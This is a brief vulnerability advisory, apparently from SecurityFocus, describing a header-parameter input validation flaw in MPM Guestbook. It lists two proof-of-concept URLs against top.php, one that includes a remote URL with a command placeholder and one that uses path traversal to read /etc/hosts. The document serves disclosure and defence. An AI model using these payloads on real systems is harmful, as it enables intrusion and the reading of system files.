MPM Guestbook Header Input Validation Vulnerability

The following examples are available:
PoC: /gbpro/top.php?header=http://[CMD]
PoC: /gbpro/top.php?header=../../../../../../../etc/hosts


 

Privacy Statement
Copyright 2010, SecurityFocus